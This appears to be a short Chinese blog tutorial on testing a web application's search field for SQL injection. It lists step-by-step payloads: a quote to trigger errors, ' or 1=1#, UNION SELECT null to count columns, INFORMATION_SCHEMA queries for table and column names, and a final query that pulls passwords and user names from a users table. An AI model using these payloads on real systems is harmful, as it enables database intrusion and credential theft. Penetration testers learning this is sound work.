测试web应用程序搜索SQL注入漏洞

1.简单的SQL注入(select colunmns from table where criteria='')

  在搜索框中输入 ' 然后单击,查看SQL错误信息,如果返回错误信息说明出现未匹配的单引号,结构破坏

 输入:' or 1=1#'(数据库的注释方式很多包括--。#。//)

 2.查询列表中有多少列

   ' union select null #'  合并一列

   'union select null,null #'  合并两列     直到合并查询出列数

3.查询表明(数据库有一个特殊对象INFORMATION_SCHEMA,这个对象包含了每张表的名称,字段,元素)

   'union select null,table_name from INFORMATION_SCHEMA.tables#'

4,查询表字段名称

  'union select null,colunmn_name from INFORMATION_SCHEMA.colunmns  where table_name='users '#'

5,查询重要字段名称数据

'union select null,password  from users#'  根据得到的字段名称和表名称,可以查询出数据

6,把查询出的数据和用户列表进行交叉使用

 'union select password,concat(first_name,'',last_name,'',user)  from users

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值